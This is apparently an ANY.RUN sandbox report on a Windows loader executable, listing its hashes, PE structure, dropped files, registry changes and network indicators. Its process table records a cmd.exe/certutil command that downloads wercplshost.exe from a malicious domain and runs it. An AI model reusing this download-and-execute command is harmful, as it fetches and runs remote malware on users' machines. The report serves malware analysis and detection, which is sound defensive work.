analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a

Full analysis: https://app.any.run/tasks/1f5a333e-3820-49e3-944a-c868adc499d1
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 17, 2019, 11:36:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
installer
loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

056762E2B205B6D6DCBCEFB5DFF0BAD2

SHA1:

94838C5EE660FC1E56296DC101B04BF83DB02347

SHA256:

C7BF075897A26B2BF80F947EAFA6C4F5F4187C6B2AF84F21DE290736E2D3257A

SSDEEP:

3072:nBwbBCHDKSh//BRkWEBhzNr1qvH5we+2arB9hotJYtg0Mu3jY+EL3Y8+OS4r:BwbBiLh7kFZI5q2kXg+8+M

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • nmbsawer.exe (PID: 1708)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 2836)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe (PID: 3724)
    • Executable content was dropped or overwritten

      • c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe (PID: 3724)
    • Creates files in the user directory

      • c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe (PID: 3724)
    • Changes tracing settings of the file or console

      • c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe (PID: 3724)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | InstallShield setup (36.8)
.exe | Win32 Executable MS Visual C++ (generic) (26.6)
.exe | Win64 Executable (generic) (23.6)
.dll | Win32 Dynamic Link Library (generic) (5.6)
.exe | Win32 Executable (generic) (3.8)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x66f7
UninitializedDataSize: -
InitializedDataSize: 114688
CodeSize: 102400
LinkerVersion: 6
PEType: PE32
TimeStamp: 2019:05:03 02:47:19+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 03-May-2019 00:47:19

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000F8

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 03-May-2019 00:47:19
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x0001899E
0x00019000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.59184
.rdata
0x0001A000
0x00004BBC
0x00005000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.47208
.data
0x0001F000
0x0002BE64
0x00017000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
4.7758

Imports

ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.DLL
RASAPI32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WINSPOOL.DRV
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe nmbsawer.exe no specs cmd.exe no specs certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
3724"C:\Users\admin\AppData\Local\Temp\c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe" C:\Users\admin\AppData\Local\Temp\c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1708C:\WebKitSdk\2.25.14\nmbsawer.exeC:\WebKitSdk\2.25.14\nmbsawer.exec7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Wzd MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2836cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/wercplshost.exe %SystemRoot%\Temp\wercplshost.exe & %SystemRoot%\Temp\wercplshost.exeC:\Windows\system32\cmd.exec7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1456certutil.exe -urlcache -split -f http://fid.hognoob.se/wercplshost.exe C:\Windows\Temp\wercplshost.exe C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
61
Read events
43
Write events
18
Delete events
0

Modification events

(PID) Process:(3724) c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3724) c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3724) c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3724) c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(3724) c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3724) c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3724) c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3724) c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3724) c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3724) c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
4294901760
Executable files
1
Suspicious files
0
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
1708nmbsawer.exe\Device\HarddiskVolume2\Users\admin\AppData\Local\VirtualStore\Windows\System32\1560703.bak
MD5:
SHA256:
3724c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeC:\WebKitSdk\2.25.14\wercplshost.exe
MD5:
SHA256:
3724c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeC:\Users\admin\AppData\Local\Temp\1590765\....\TemporaryFile
MD5:
SHA256:
3724c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeC:\Users\admin\AppData\Local\Temp\1590765\TemporaryFile
MD5:
SHA256:
3724c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeC:\WebKitSdk\2.25.14\nmbsawer.exeexecutable
MD5:EABDC54C61088B769E9AF917AA6B05A4
SHA256:51E880F62A34CF8C49B343EFF2F94F75FB8060EDEA4F3B29E2230DC120D4D38F
3724c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3724
c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe
GET
107.174.20.105:80
http://fid.hognoob.se/wercplshost.exe
US
malicious
1456
certutil.exe
GET
107.174.20.105:80
http://fid.hognoob.se/wercplshost.exe
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3724
c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe
107.174.20.105:80
fid.hognoob.se
Nexeon Technologies, Inc.
US
suspicious
1456
certutil.exe
107.174.20.105:80
fid.hognoob.se
Nexeon Technologies, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
fid.hognoob.se
  • 107.174.20.105
malicious

Threats

PID
Process
Class
Message
3724
c7bf075897a26b2bf80f947eafa6c4f5f4187c6b2af84f21de290736e2d3257a.exe
Potential Corporate Privacy Violation
ET POLICY Unsupported/Fake Windows NT Version 5.0
No debug info